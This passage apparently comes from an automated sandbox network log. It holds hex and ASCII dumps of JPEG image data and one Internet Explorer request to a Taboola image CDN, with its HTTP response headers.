                                                Data Ascii: (T7=^HM1;K'Qq^YA*jY8<7*X~kw9.8dyJ#e*\W+DcMPIC9F5RN;>uWs]C(Y.}Rlc^df+rtT}MCL4,$<$oT:c{TOs)PH`-9'%lq5J,;Sc5*I'ZR5'{UN<7=F
                                                2021-09-10 09:28:24 UTC25INData Raw: 8e 05 24 2f fa 7d 87 1a bc 8d c4 12 90 8d 90 01 d6 c9 22 af ae fe f3 0c 92 ce 66 12 f2 8f 8a 81 95 c0 fe a1 59 2f bc f6 1a 25 69 fd 77 30 b0 56 6c 3e 40 2b ed 53 5b 49 cd e7 95 63 8c b1 2c 72 40 ef ec 05 4c 20 0b cd a7 66 55 ed c1 75 bf 99 a8 66 85 c2 a1 88 1e 52 05 c1 f9 8c d2 c0 ab cf 08 15 99 71 56 1c be f1 78 1f ba f0 c7 d0 e6 a6 46 f5 2d bc af 3d d5 ca 73 82 54 51 b2 35 4c ca bb 3d 86 2a d2 eb 8f 54 bf b7 f4 c9 67 3c 83 7b 71 d5 4f fe 1f e9 93 a8 78 9d d3 5a e2 72 b5 2f f8 6e e1 0e ae 50 8f a5 5e 59 35 a4 a8 8e 43 12 b9 c8 18 a5 b6 f5 b8 38 60 ad 13 e7 b7 b8 a7 0e 0e 01 dd 14 e2 e4 b5 95 bb 9f 2c 41 a4 96 30 bf e8 04 fa 51 bc 83 b2 91 5f 7b 6c 64 28 a7 bf 29 dc 8a fb fc c7 b2 3e 3e 4b 42 7b c7 ec 30 3e 66 9e 66 5c fa 97 6a 83 f7 34 6e ac b0 5c 49 2c
                                                Data Ascii: $/}"fY/%iw0Vl>@+S[Ic,r@L fUufRqVxF-=sTQ5L=*Tg<{qOxZr/nP^Y5C8`,A0Q_{ld()>>KB{0>ff\j4n\I,
                                                2021-09-10 09:28:24 UTC26INData Raw: d3 e4 8c dc 8a 96 1e e0 d2 da c4 a4 09 3e 2c 1a 92 38 c4 b1 f0 70 01 6c 12 46 00 a6 4b 93 34 91 44 fc 90 1c 65 06 01 1e f9 a8 ba 6c 84 15 67 08 a7 b9 d9 35 15 a5 b5 af c2 87 3f ef 3e 68 9f 14 0e 01 a8 ad 99 d0 bb 38 8d 33 8c b6 aa 45 85 14 08 cf 2f 05 8d 1c d6 08 07 74 ec 38 6e ad 5a 6f bb c0 24 53 c8 44 99 27 c9 c5 75 b1 ea 74 cb 90 87 e2 40 1f e9 c4 d5 d7 4e 4b 9b 9b 99 5a 6f 4d 55 03 67 89 6c b6 09 c1 f6 d2 f7 a8 65 8d d0 7a 6c 0a 2f c2 00 f9 0a 50 19 80 07 1f 33 92 2b 38 de 2b a7 5a 74 8b 9b 61 2c 51 f3 61 a6 e7 b6 53 ec 45 7a 69 18 c4 68 ab f2 1a a9 65 c8 20 0c 82 08 62 0f 6c d4 c6 29 60 b9 b5 49 39 c8 b0 1d 79 a9 e4 3e 84 12 ab b0 60 31 56 b3 89 63 6f 50 83 20 27 e5 aa b9 60 21 72 5d 46 bb 9e d5 24 5d 44 db 24 6a b0 4c 82 4e 67 8f e2 fd 0d 41 6d 34
                                                Data Ascii: >,8plFK4Delg5?>h83E/t8nZo$SD'ut@NKZoMUglezl/P3+8+Zta,QaSEzihe bl)`I9y>`1VcoP '`!r]F$]D$jLNgAm4
                                                2021-09-10 09:28:24 UTC28INData Raw: 83 92 a9 da a0 60 85 78 ae fd cf 70 7e b4 24 b6 bb 26 17 4c 48 14 12 08 35 3f 4e 96 03 ce 26 d0 d8 20 e0 8a b0 eb f2 c2 ea 97 88 5c 0f ce 06 1c 7d 47 9a 8a d2 2b a6 bf 82 19 98 88 bf cc 5a 15 f0 5b 78 ab 79 96 7b 48 26 58 d4 33 2e 1b 59 1c 81 c1 a8 cb 80 40 18 fa 6a 91 48 60 79 53 7b d4 fd 42 18 4e 0b 72 6f 0a 2a ff 00 aa a3 63 ef 13 80 bf 96 24 d9 3f 5a bc b9 b9 b8 05 61 50 89 d8 05 d1 c7 cc d4 16 49 1b 7c 5f 1b 9f cb e2 96 1f 90 f9 0a 1a 1b ef 59 c5 65 9b e9 40 01 f6 8a 89 0c 92 24 4a 40 67 60 aa 7e b5 6f d0 44 0a de b5 db 7a 9f 2f c2 0d 4c af 13 fa 37 6b c5 8f e0 71 d9 aa ea ca 66 e2 a9 bd e4 52 4f 35 ab 48 19 40 91 86 3d 46 1c b5 ff 00 35 2a 5b 5e 21 62 a1 38 f1 3c db 0a ae de df 2c d1 82 64 9d 46 d8 6f 82 20 1b 23 c8 ee 14 7c ce ea d2 1b c4 2d ea ba
                                                Data Ascii: `xp~$&LH5?N& \}G+Z[xy{H&X3.Y@jH`yS{BNro*c$?ZaPI|_Ye@$J@g`~oDz/L7kqfRO5H@=F5*[^!b8<,dFo #|-
                                                2021-09-10 09:28:24 UTC29INData Raw: cc 03 37 11 9d 9a 62 a4 b7 13 ac 9c 54 6c d1 ba c8 bf 8d 4e 70 7c d4 33 64 20 46 e5 28 c1 5f 6c af 6f dc 7c 34 9e 91 ca e7 f9 44 6b e5 1c 87 47 ff 00 a1 a9 61 71 73 14 c9 c5 5d 4f 23 1f 86 92 13 b5 fa 9e e2 ba 80 33 5c 7d f2 28 db 84 f9 75 18 c1 05 46 ea 56 76 61 23 10 73 8d 8a f0 3e 54 df 88 1a 61 90 68 8d 1f 9e e8 80 0e 05 0e ea 7e 46 b2 c5 8e 3f e9 1e f4 74 33 50 40 8e bb 3f 3a 78 b0 7c 03 41 81 18 2b 93 9e fe d5 96 5e 2a c7 00 6c 11 f3 a8 ae 02 32 86 41 e9 8c e4 7b 2b 69 80 fe f4 8e ce a1 d1 c3 b1 20 a9 1d bd 58 bf fe 96 a6 4f 5e d2 68 10 e9 7f cc 42 3d 91 fb 8a 5e 3c 4f 7c fb 8a ee 08 34 1b 23 1b cd 0e f4 3c a9 ec 32 2b 41 33 f9 a9 86 47 7f 22 8e 09 01 74 2b 46 87 d8 7e dc fd 82 99 95 01 66 3a af bc 2b 61 56 31 df b9 dd 44 ac 99 01 a9 4f 27 2d e0 68
                                                Data Ascii: 7bTlNp|3d F(_lo|4DkGaqs]O#3\}(uFVva#s>Tah~F?t3P@?:x|A+^*l2A{+i XO^hB=^<O|4#<2+A3G"t+F~f:+aV1DO'-h
                                                2021-09-10 09:28:24 UTC30INData Raw: 17 56 24 75 d6 68 be 0f 34 12 b3 4f 34 64 32 00 40 ec 64 6b 0c 4e 0c 55 b6 ab 9e ff 00 38 e9 a6 0f ea 10 8d 64 ee 1f 7c 2b 03 3e e3 1a 95 23 16 2d 20 76 61 02 1f a6 b9 19 0b 30 57 01 4d 13 de 44 8c a8 40 ef 75 f2 32 6d 44 2c 78 6e b8 38 91 46 79 ab 23 19 68 92 23 bb cd 24 70 bc bf 5c a1 6a ca 96 c6 74 46 0a 66 0e 76 80 58 0c f5 d0 af 5c 83 8a fa 74 96 47 0d 45 fb c3 ac 4b a3 67 0e b9 3a c6 9d 18 f2 41 18 1e 25 7d c2 f0 ea 9c 80 ab 7f d3 0e b1 55 b6 b2 fe 46 09 8b 35 9c 32 0a fd 0d 86 74 6e 06 07 1e 41 cf 55 2f 80 70 48 07 bf 39 b5 98 71 14 87 12 29 c9 d8 22 23 f2 70 69 a7 e3 f4 0e 6b 93 8f a2 90 06 de fc 2a 93 c0 cd 4e 9f d1 58 59 59 8e f1 79 a4 0f b9 89 73 5d 67 04 d5 8c 50 0d 93 d5 e4 0e 48 52 2c f3 ff 00 8c d4 cb ba 42 16 f8 e3 22 ff 00 0b 36 96 19 02
                                                Data Ascii: V$uh4O4d2@dkNU8d|+>#- va0WMD@u2mD,xn8Fy#h#$p\jtFfvX\tGEKg:A%}UF52tnAU/pH9q)"#pik*NXYYys]gPHR,B"6
                                                2021-09-10 09:28:24 UTC32INData Raw: 5c af 27 b2 4e 15 b6 8c da 82 4f 00 9a cd 44 c9 13 93 23 fe d3 40 60 96 19 22 91 01 6f a1 09 1f 7b c5 e4 8c 91 81 da a0 de db ff 00 ce 02 44 7d 76 70 76 7f 18 bd 8c 26 b4 fa 7f c5 e2 00 cc 41 35 f7 38 9d 9f 6c d2 f9 fb 8c d8 1d e3 5f be 69 81 8e 76 8e 81 05 88 cd 6c 36 51 90 55 76 06 46 ac e4 28 fd 58 44 d1 82 49 60 31 b5 2c 0a f0 4b 30 cd 34 0d 3c 4a f2 36 c2 d7 c0 e4 d6 2e 96 21 ee 7f 9c d3 c7 18 3c 20 c9 03 3b 69 e2 16 09 7d df 80 bd e4 ee 0c fb fd 55 00 0e 57 34 af 0c f3 3c 8b 33 50 62 4a 75 de 3c 30 ee b6 8c 5e 6b e5 d4 8d 69 8d 64 72 0c 48 c1 57 fa 9f ed 90 46 d0 cf a5 91 c6 d1 14 ad bf 7b 59 6b 21 6c 0c 95 a0 d6 a5 c6 ff 00 50 6a 16 30 86 4d ea 78 3d 1c 1c 11 92 0a 73 80 13 1d d7 ee 03 00 ef 38 c9 19 16 28 41 23 85 1c 67 f8 54 dc 39 38 f1 05 8f 8f
                                                Data Ascii: \'NOD#@`"o{D}vpv&A58l_ivl6QUvF(XDI`1,K04<J6.!< ;i}UW4<3PbJu<0^kidrHWF{Yk!lPj0Mx=s8(A#gT98
                                                2021-09-10 09:28:24 UTC33INData Raw: 00 2c 72 28 03 02 48 a1 e0 64 27 6c ab fc 8c 96 36 92 50 14 12 49 aa cd 2e 80 43 12 fa ac b7 8d ab 8a 3f d3 5c 75 58 75 21 fe a6 52 de d7 f2 3f 8c d6 86 2f 11 0b 7f 49 c9 91 24 8d b8 1b d7 9c d2 e9 55 15 65 99 95 4f 6a a7 bf cd 62 eb 61 48 8e f6 72 d7 77 9a 7d 74 5a 88 d7 d2 d9 63 bb 16 72 77 8a 4d 28 2a 8a b2 0a ba e3 24 66 64 50 de 06 2b 00 30 9c 91 95 2b 90 4f b6 7a 88 47 78 75 01 45 28 fe b9 2c b2 c8 7b 35 81 1b 9e 3e 40 03 56 7b cb 48 fe ed 88 8c c7 73 71 78 94 0a 80 3f 03 23 d0 01 21 de 0d dd 81 d5 64 37 08 1e 94 62 cf ee 3d e4 f2 aa 86 a7 32 38 fe 83 24 96 28 10 cb 2b 70 39 c8 0e a3 5c a2 44 71 0c 37 5c f2 4f c8 9c f8 94 65 a1 8d f9 b1 20 1c 7b 36 3a 34 7c b5 b5 8a bc 9a 37 d8 08 35 f6 02 b2 28 35 33 4a 91 43 1b 3c 8d d2 8c 87 e0 03 4a 85 e5 49 a6
                                                Data Ascii: ,r(Hd'l6PI.C?\uXu!R?/I$UeOjbaHrw}tZcrwM(*$fdP+0+OzGxuE(,{5>@V{Hsqx?#!d7b=28$(+p9\Dq7\Oe {6:4|75(53JC<JI
                                                2021-09-10 09:28:24 UTC34INData Raw: 32 28 2a a8 81 a8 8e cb 60 4a 3c 9c 53 76 aa 28 57 cc 7c a7 aa 51 8a ac d4 17 16 20 3b e4 ff 00 99 e4 48 91 a4 73 4a a2 ce 36 b6 57 d4 34 cc 4f 2d 61 71 fe 2d 32 56 ed 29 1f 93 58 7e 2b a8 7e 07 d2 3f e5 1f fd 9c 92 59 e4 e5 af fe e3 78 54 91 5c 93 74 06 68 74 d1 e9 23 da 68 c8 c2 df 37 96 de 19 08 18 15 23 a2 7b 38 d2 3e ef 1b 48 bc 55 0c 5b 19 c0 ba 1f 7b c6 36 f7 e2 c6 28 01 87 34 39 ff 00 29 45 6e c6 00 07 00 57 ce be 77 9a b8 1e 78 24 5b a1 63 8f 39 34 72 46 d4 46 00 dd b3 12 71 47 16 78 cb 0d c2 db 7d 80 bc f8 7e 9d 91 d6 59 a2 da 4f 08 a7 fb 9c 62 15 b7 b0 16 31 a5 60 c5 7c 61 0c ce 40 f6 ce 15 45 d1 61 c7 f5 c2 6e d8 60 42 c1 4d 72 38 ac 7f 61 8f d1 6a fc 0f 90 1f 2f e3 fe 03 75 c6 33 49 f5 00 c5 49 f2 32 78 15 f8 68 f9 f0 7d af ac 3a 0d 31 61 65
                                                Data Ascii: 2(*`J<Sv(W|Q ;HsJ6W4O-aq-2V)X~+~?YxT\tht#h7#{8>HU[{6(49)EnWwx$[c94rFFqGx}~YOb1`|a@Ean`BMr8aj/u3II2xh}:1ae
                                                2021-09-10 09:28:24 UTC36INData Raw: f3 91 2e e9 00 f6 e4 e1 b9 24 6e 68 0c ff c4 00 40 10 00 02 01 03 02 04 04 03 06 04 05 03 03 05 00 00 01 02 03 00 04 11 12 21 13 31 41 51 05 22 61 71 14 32 81 10 23 42 52 62 91 72 a1 b1 c1 20 24 33 43 82 34 63 92 06 15 e1 30 a3 c2 e2 f0 ff da 00 08 01 01 00 0a 3f 00 8a 39 6e 7c cf b6 e0 0d db 71 58 72 d8 c6 c7 6c 67 3e d5 21 f3 ec d9 5c 1a 95 98 a8 3c c6 32 0e 71 45 04 9a 58 29 60 57 52 72 cd 17 60 f1 89 02 8f 2b ab 90 1d 2b 5a c7 2b 60 1e 59 06 87 dc df 46 7d b5 02 29 ca be 47 9b 18 39 1c fe 86 9c 66 20 ac 0a 6e 18 7b d6 80 57 19 08 35 1d f3 4d 20 f9 90 95 0a 49 e7 83 b6 e2 82 c7 73 24 50 c7 b6 c6 43 96 00 7d 0d 16 96 2b 88 8a 3a 11 f3 2b e0 8a 99 59 dd a5 d6 24 cb 22 a7 97 39 15 24 50 25 b0 99 c3 4a cc 34 ae 94 24 77 66 e6 45 3d 8c 2f a1 21 99 a0 37 00
                                                Data Ascii: .$nh@!1AQ"aq2#BRbr $3C4c0?9n|qXrlg>!\<2qEX)`WRr`++Z+`YF})G9f n{W5M Is$PC}+:+Y$"9$P%J4$wfE=/!7
                                                2021-09-10 09:28:24 UTC37INData Raw: e7 62 77 07 ad 45 e6 99 1d 81 71 95 08 a4 0d f7 d8 13 bf 71 4f 24 72 40 12 79 63 52 d8 68 49 d2 ea 36 d8 ea 39 a0 61 72 f2 87 5d c3 2b 1d 40 8e f9 a3 1c f7 d3 3c d2 a6 ac e0 67 08 0f 40 71 cf 14 74 4c 97 0a e3 1f 91 75 0a 2d 2e 7c a4 ef a0 7a 51 f3 68 5f fc 98 0a c8 86 d6 d8 13 d8 b2 8a 64 8e 07 ba c8 0c 17 26 46 1d 48 3f 96 90 8b bb 11 2a 28 3c cc 0d ff 00 ef 44 89 8c 81 f5 e4 95 2a 72 46 69 82 a4 ac ea 18 e7 76 df ca 4f 4a c8 8a 79 52 45 20 b6 41 c3 00 7f 7a 58 4f 14 6b 50 72 57 19 1b d5 ce 85 3f 22 60 03 fb d3 86 30 97 d3 c8 f9 5a 81 0c c2 42 09 0a 1c 38 cd 20 26 35 27 20 13 ed 5e 44 99 71 e5 d8 6a 38 3c a9 d2 41 92 84 a6 4e 43 6a 1b 1c 77 a8 58 87 52 a1 90 1e 7b d4 4a f3 5e aa 1c 37 2d 59 03 22 95 96 29 00 46 57 65 25 5f 39 19 3d b3 4e 15 db 21 81 d7
                                                Data Ascii: bwEqqO$r@ycRhI69ar]+@<g@qtLu-.|zQh_d&FH?*(<D*rFivOJyRE AzXOkPrW?"`0ZB8 &5' ^Dqj8<ANCjwXR{J^7-Y")FWe%_9=N!
                                                2021-09-10 09:28:24 UTC38INData Raw: 5e c5 7b 64 74 a6 58 f4 21 55 fe fb 7b 52 06 78 a5 41 af 75 25 c6 9d c7 6c 9a e3 c0 0c a8 eb af 18 41 82 a3 24 79 99 73 cf 03 35 aa 25 53 2c 79 18 60 fc b7 ed 8d c1 14 4e cb cb b6 69 5b 31 ae 00 34 04 ad 67 34 f8 c7 25 2e ab bf ed 45 fe f1 4a 69 3b 96 ce 3f a1 a6 04 85 1f 2e 4a 16 60 01 fa 53 13 73 7b 2b 23 e1 82 05 12 39 dd 94 1a bd d0 4e f9 74 c1 c7 b2 d6 12 d6 78 e4 ee 4f e1 24 9a ff 00 a8 b6 96 3f a8 1a ff 00 b5 12 cb 09 90 7b c6 43 52 e4 24 a5 7d ea e5 b4 a2 96 8e 43 a8 2e 9d 86 9c 0d 85 2a 29 76 49 03 75 23 cc 84 7a 8c d4 62 6d 7a 0a b7 94 9a 95 27 56 1a 54 10 14 e4 e7 ce 7b 0f 4a 91 d9 a4 64 65 00 79 08 d8 9c f5 06 90 2e 37 0c 7d 71 4e ae d3 b7 91 5b 4e 15 63 2c 58 13 f9 71 9c 75 a8 3e 16 fe 24 31 a5 c8 5d 01 e0 2d b3 6b e4 de 6d a9 15 16 dc a4 7a
                                                Data Ascii: ^{dtX!U{RxAu%lA$ys5%S,y`Ni[14g4%.EJi;?.J`Ss{+#9NtxO$?{CR$}C.*)vIu#zbmz'VT{Jdey.7}qN[Nc,Xqu>$1]-kmz
                                                2021-09-10 09:28:24 UTC40INData Raw: 76 c1 f5 15 6a d6 f0 85 da 16 c9 20 1d 87 31 cb 35 24 8c de 6d 6e 16 20 a5 47 77 39 da 9d ac 50 e2 3b 48 47 9e ea 55 6c 65 98 95 c4 6b 56 b6 c9 02 92 a1 01 92 35 19 00 6b 11 85 0b 42 26 59 d9 14 a8 38 75 1b e7 0d 5f 0e 64 2f 22 bb 02 06 5d 8e ad c7 a9 a8 a7 99 b9 c9 1a 72 07 a9 73 45 17 18 25 58 8e 7e bc e9 e0 59 a4 28 19 42 f3 1b ea 70 29 4b a0 f2 3a e3 0c a7 d4 77 a8 df 20 87 b7 7c 1f a1 53 56 76 31 73 72 8a b1 02 7d c6 37 a7 86 dd c6 26 ba 39 57 91 7a aa 53 35 c8 b5 78 21 8f 92 a4 ba 4e 25 f5 3d ab 53 38 4d 52 9e 48 58 ff 00 63 56 8d 7b e2 11 3b 9e 15 b9 60 bc 16 50 c0 c8 e5 98 e3 50 22 ae a7 8a ca 7b a5 ba 37 33 99 04 d2 45 21 8d 10 ae ca 14 05 c9 a0 b6 81 8a a2 db 32 47 b2 8c e5 63 5a 5d 8e a8 f3 c8 83 b8 06 a2 39 38 63 18 c0 34 92 79 30 b0 15 d5 c5
                                                Data Ascii: vj 15$mn Gw9P;HGUlekV5kB&Y8u_d/"]rsE%X~Y(Bp)K:w |SVv1sr}7&9WzS5x!N%=S8MRHXcV{;`PP"{73E!2GcZ]98c4y0
                                                2021-09-10 09:28:24 UTC41INData Raw: 3e c0 b9 1b e0 76 14 98 75 cb df 07 05 54 03 b8 5f cc c7 f9 57 87 5b c0 17 0b 34 9a e5 9c e3 a9 d8 0a 96 78 62 ba 1c 3b 74 52 91 97 4e 6c 46 58 91 ad 0d 42 b8 5c af 57 c7 a2 9d c5 4b 2a 30 c5 ba 4c e4 24 61 79 84 40 14 d4 de 1d 73 66 4f c2 de 5a 69 49 61 57 1a 5d 06 a0 41 46 1c d4 fd 83 66 34 54 a0 24 30 38 34 11 d5 83 02 ad a0 06 e8 ca 47 c8 de a3 6a 7b 88 06 00 bb 03 cf 18 e8 27 41 d3 f5 8a 17 31 49 1a 49 18 4d d5 75 1f 9c b0 1b 6d c8 83 50 47 1a e5 24 68 0e 66 c0 e6 78 84 e5 c7 b1 00 0a 44 11 40 25 5b 77 8b 87 01 e2 1e 6e 4e 18 13 8f 99 c8 34 4c 9c 25 77 b7 9a 36 1b 37 26 8d 9c 0a 7b b8 80 cb 42 c5 7e 25 07 a3 36 56 55 1f 95 eb 43 44 47 11 4a b2 f0 fd 25 46 cb 44 77 e6 72 99 fc 55 08 bb 8a 56 ba b6 ba 0e 15 84 4e a0 98 f5 02 01 43 52 60 a9 66 50 e1 00
                                                Data Ascii: >vuT_W[4xb;tRNlFXB\WK*0L$ay@sfOZiIaW]AFf4T$084Gj{'A1IIMumPG$hfxD@%[wnN4L%w67&{B~%6VUCDGJ%FDwrUVNCR`fP
                                                2021-09-10 09:28:24 UTC42INData Raw: 0a 00 dd db 24 ec 83 71 1b 9d 99 3e 8c 08 a0 fb 9e 60 0e 67 60 31 5c 38 16 69 09 79 4e 70 71 86 0a 5b 90 18 ab 96 ba 4b 49 ae 0c e8 0e 26 f8 68 c9 d3 a9 86 34 ed 4a 92 88 10 bc 4a 5c cb ad c7 15 1c 73 50 ae 8c 31 87 27 20 d4 09 30 0b 1d cd cb 69 59 84 63 92 c8 dd bb 1a f0 b0 dd be 2a 3a 49 a3 3f 2b 46 c1 d7 f7 15 c4 b6 9b 69 62 6d 83 0a e2 da 4e 16 29 d5 86 a3 1c ab c8 33 75 04 54 72 c7 a4 14 8a 6d b4 86 19 cc 52 0d d0 ff 00 2e f5 05 c5 ab 3e b8 ad ee 23 11 ce 99 1c d5 d7 19 3d 9d 48 26 9e e6 da 08 9a 49 ac a6 6d 37 50 22 79 ce 86 e5 22 8a 16 92 f1 8c 86 39 5f ca 76 00 aa 39 fe 4a 69 db c3 e4 93 5a 19 30 a6 26 3f 30 06 83 a9 ed d2 b8 60 e0 bc 91 92 24 23 b0 d3 d4 d5 b5 ca c2 fa 6e 38 73 2b f0 c9 c9 01 82 92 72 4d 08 d0 be 14 75 77 73 d8 6e 49 ad 73 31 10
                                                Data Ascii: $q>`g`1\8iyNpq[KI&h4JJ\sP1' 0iYc*:I?+FibmN)3uTrmR.>#=H&Im7P"y"9_v9JiZ0&?0`$#n8s+rMuwsnIs1
                                                2021-09-10 09:28:24 UTC44INData Raw: 8a 28 08 59 6e 6c 12 55 4c bf 16 5d 33 45 f5 d5 16 9f 66 34 d2 cb 77 e0 87 c3 78 8e 16 50 0c 2e 36 8d 79 a9 e1 9a d4 54 59 5d 89 98 87 24 cb 19 81 82 fd 60 ad 66 db c7 6e d5 58 ed e5 98 ad ce 77 3f f7 28 e7 a8 61 82 3e c0 47 a6 c6 b5 40 c7 04 11 b0 cf 53 41 22 90 28 95 06 fa 75 ed 9f f0 fc bb 76 db ec 58 20 e2 e5 e6 64 67 0a 39 f2 4d cd 3b c4 16 5e 16 b0 55 94 0d cb 00 09 01 b6 cd 4f 1f 8a 5a 5f b3 cf 1d ca f9 2f 6d 66 00 11 d8 14 20 ab 77 06 a7 36 46 e2 3f 85 49 47 de a4 77 1a da 0d 43 dd 1a 26 f5 15 b2 b3 36 0f 3e 1b fc eb ee a7 7a 42 63 90 07 5d 38 47 68 8e ad c0 e4 71 b8 35 2e 99 1d f5 00 ba 19 40 19 ce 3a 91 be f4 8c 36 81 e7 8b 1a 64 6c 63 0e 07 27 14 36 99 a2 9f d9 b6 60 4f ee 68 aa 5d 44 6d df df 90 27 f7 14 e2 68 a1 33 5b 91 b3 71 a0 22 68 ff 00
                                                Data Ascii: (YnlUL]3Ef4wxP.6yTY]$`fnXw?(a>G@SA"(uvX dg9M;^UOZ_/mf w6F?IGwC&6>zBc]8Ghq5.@:6dlc'6`Oh]Dm'h3[q"h
                                                2021-09-10 09:28:24 UTC45INData Raw: 8f 87 ce 11 ca b4 d0 dc ae 54 3b 8d c2 17 45 18 a4 88 47 e1 71 48 49 7d 7c 37 b4 90 ab 6b 6f cc c2 55 a6 8e da ee ee 6c b2 80 b8 60 04 c0 6f cb 2a e2 81 f2 ea 38 ee db ff 00 83 cc de 55 a9 2d ad e7 19 85 9d 70 d2 0e ea 0d 69 d5 f3 77 3e e6 b4 e3 91 ac 38 1c bb 8e e3 ec cd c5 c9 e0 40 07 32 cd cc 8a f3 46 b9 90 fe 69 1b 76 3f 60 54 50 59 98 f2 0a 37 24 d0 48 13 36 5e 1c cc 32 ca 8b b3 32 2d 1d ce 59 89 cb 31 ee c6 a1 b7 11 36 6d ee a5 71 13 44 fe 8c 48 ab 7f 8f 49 3e 22 d7 c5 a1 90 5c db dd ac 78 3c 2b 95 8f 38 63 8f af e2 ac 5a df 12 23 b5 d7 94 45 97 cd f7 04 81 82 8c 7c a3 b5 3c cf b5 bc cc 40 69 90 c5 83 87 c7 32 a5 72 1a 86 a7 0a ce 8b b6 9b 88 01 25 7f e4 ba 85 12 f1 c0 67 b4 6d 47 06 19 f0 4e df 41 41 92 78 7e f1 5b 60 49 18 71 4e a9 e1 d6 f2 47 70
                                                Data Ascii: T;EGqHI}|7koUl`o*8U-piw>8@2Fiv?`TPY7$H6^22-Y16mqDHI>"\x<+8cZ#E|<@i2r%gmGNAAx~[`IqNGp
                                                2021-09-10 09:28:24 UTC46INData Raw: 80 3f 09 a1 32 1b b6 68 5f 9f 04 c8 75 86 2a 72 18 6f ca ae e1 8e 4b e6 8a c2 ed 08 43 02 dd 36 86 60 8b b8 07 b0 34 65 bb 04 eb bd 9f cf 33 1e b8 fc b5 14 11 34 8d 23 22 0d 8b b7 32 69 1f c3 67 2b 0d ed 8b 9c 20 d6 76 51 fa 49 dd 48 dd 0d 41 73 e1 fe 21 a9 6c ae 5a 3d 17 11 ba b6 96 86 52 98 27 49 db 50 af 15 b2 d2 30 23 32 fc 44 03 fe 12 e6 a4 bc f1 4b bd 5c 4b 99 ce 1d c0 f5 e4 88 3f 28 ae 2c ec 30 65 23 18 1f 95 07 e1 5f b1 4d e3 26 b7 77 f9 20 8c fe 2c 1f 98 f6 14 d2 3c 87 54 d3 3e ef 2b 77 63 5a 63 45 2c e7 b2 a8 c9 a2 9e 18 43 13 0b 1f 9a 38 d7 59 91 87 e7 39 da b8 57 0d 10 45 93 5b 48 1a 35 e8 ba 89 2b 44 4d 78 c2 cd 08 e8 1c 12 e7 ff 00 10 45 71 af a7 4e 29 8f 3a 43 48 f8 77 25 bf 48 da bf ff d9
                                                Data Ascii: ?2h_u*roKC6`4e34#"2ig+ vQIHAs!lZ=R'IP0#2DK\K?(,0e#_M&w ,<T>+wcZcE,C8Y9WE[H5+DMxEqN):CHw%H


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.549819151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-09-10 09:28:24 UTC12OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC47INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 16421
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 602770203899579805985979531162266752360,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "d2c20bf7706c810f628219875d8fd66e"
                                                last-modified: Thu, 09 Sep 2021 10:09:46 GMT
                                                status: 200 OK
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-request-id: 8f8b2bee81a4ace00bdbca0cc35fc00b
                                                x-envoy-upstream-service-time: 22
                                                X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb802
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 81973
                                                X-Served-By: cache-wdc5545-WDC, cache-dca17757-DCA, cache-hhn4051-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 1
                                                X-Timer: S1631266105.706204,VS0,VE1
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2Fimages%2F824258cd-2488-4e7c-b171-dad87f56f610_1000x600.jpeg
                                                X-vcl-time-ms: 1
                                                2021-09-10 09:28:24 UTC48INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 01 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 04 07 00 02 03 08 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 41 0a 58 44 58 bb 12 cb 26 82 8c 92
                                                Data Ascii: JFIF+""+2*(*2<66<LHLdd+""+2*(*2<66<LHLdd7"6AXDX&
